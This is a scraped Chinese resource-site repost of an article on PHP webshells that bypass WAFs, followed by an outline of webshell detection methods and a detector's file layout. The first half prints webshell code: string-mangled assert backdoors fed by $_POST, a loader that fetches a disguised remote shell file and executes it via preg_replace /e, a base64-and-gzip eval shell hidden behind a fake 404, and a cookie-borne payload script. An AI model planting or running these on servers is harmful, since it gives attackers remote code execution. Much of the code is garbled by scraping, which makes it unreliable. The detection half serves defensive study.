桃源资源网

PHP常见过waf webshell以及最简单的检测方法
网络编程 2024/11/8 佚名
3 2

前言

之前在Webshell查杀的新思路中留了一个坑 "color: #ff0000">常见绕过WAF的PHP webshell

字符串变形

大小写、编码、截取、替换、特殊字符拼接、null、回车、换行、特殊字符串干扰

<"YXNzYXNz+00000____");
$a = substr_replace($a,"ert",3);
$a($_POST['x']);
"htmlcode">



<"htmlcode">



<"htmlcode">



<"$this->a");
 }
}
$b = new test;
$b->a = $_POST['x'];
"htmlcode">



<"Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(sprintf('%s"H*",
'687474703a2f2f7777772e77326e31636b2e636f6d2f7368656c6c2f312e6a7067'),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
"htmlcode">



<"htmlcode">



<"" and $dao!=""){
 $cai=gzuncompress(base64_decode($cai));$cai(gzuncompress(base64_decode($dao)));
}
header('HTTP/1.1 404 Not Found');
"htmlcode">



import requests
url = 'http://localhost/"phpinfo();".encode('hex')
cookies = {
 'PHPSESSID':payload
}
r = requests.get(url=url,cookies=cookies)
print r.content





PHP混淆加解密




以phpjiami为例


就是将函数名、变量名全部变成”乱码”,且改动任意一个地方,都将导致文件不能运行。具体可访问: https://www.phpjiami.com/


PHP webshell检测方法




目前我所了解的webshell检测方式有:


    
  
  1. 机器学习检测webshell:比如混淆度、最长单词、重合指数、特征、压缩比等
    2. 
  
  2. 动态检测(沙箱)
    3. 
  
  3. 基于流量模式检测webshell:agent
    4. 
  
  4. 逆向算法+静态匹配检测webshell:比如D盾webshell查杀
    5. 
  
  5. 根据文件入度出度来检测
    6. 



实例展示




这里以PHPjiami的webshell为例,其中 2.php 即为phpjiama的木马


PHP常见过waf webshell以及最简单的检测方法


可以明显看到明显的webshell规则了,这样再用静态规则、正则等即可轻松检测到。


简单检测思路




检测思路:


文件上传->文件包含->获取所有文件中的变量到临时文件中->静态规则匹配临时文件->返回匹配结果




├── __init__.py

├── conf

│   ├── __init__.py

│   ├── config.py

├── core

│   ├── __init__.py

│   ├── all_check.py

│   ├── data_mysql.py

│   └── file_inotify.py

├── lib

│   ├── __init__.py

│   └── semantic_analysis_api.py

├── test

│   ├── __init__.py

│   ├── file_md5_move.py

│   ├── os_check.py

│   ├── random_file_test.py

│   └── ...

├── web

│   ├── static

│   │   ├── css

│   │   │   ├── main.css

│   │   ├── images

│   │   │   └── background.jpg

│   │   └── js

│   │       └── upload.js

│   ├── templates

│   │   ├── index.html

│   ├── upload_file.php

│   └── include_file_to_tmp.php

├── webshell_check.py






conf中包含的是诸如下列的静态检测规则


PHP常见过waf webshell以及最简单的检测方法


总结


以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对的支持。


                                

                                

                                     

                                

                                    标签:
                                        
php过waf,webshell,php,webshell,php,waf扩展

                                     

                            

                        

                        

                            

                                免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件!
                                如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
                            

                        

                        

                            
                            
                        

                        
                        
桃源资源网 Design By www.nqtax.com

                        
                        
                    

                    

                        

                            

                                

                                    

                                        

                                    

                                    

                                        

                                            
                                        

                                    

                                

                                

                                    
www.nqtax.com
                                            
                                                桃源资源网 
                                    

                                    

                                        

                                            
                                        

                                        

                                            
                                        

                                        

                                            
                                        

                                        

                                            
                                        

                                    

                                    

                                    

                                        

                                            19,905影音资源
                                        

                                        

                                            44,626技术资源
                                        

                                        

                                            1,817软件资源
                                        

                                        

                                            378,645站长资源

友情链接

杰晶网络 DDR爱好者之家 桃源资源网 杰网资源 富贵资源网 南强小屋 铁雪资源网 幽灵资源网 万梅资源网 狼山资源网 白云岛资源网 昆仑资源网 相思资源网 明霞山资源网 内蒙古资源网 黑松山资源网 茶园资源网 饿虎岗资源网 大旗谷资源网 常春岛资源网 岱庙资源网 兴国资源网 快活林资源网 蝙蝠岛资源网 帝王谷资源网 白云城资源网 伏龙阁资源网 清风细雨楼 天枫庄资源网 圆月山庄资源网 无争山庄资源网 神水资源网 移花宫资源网 神剑山庄资源网 无为清净楼资源网 金钱帮资源网 丐帮资源网 华山资源网 极乐门资源网 小李飞刀资源网 凤求凰客栈 风云阁资源网 金狮镖局 鸳鸯亭资源网 千金楼资源网 更多链接
桃源资源网 Design By www.nqtax.com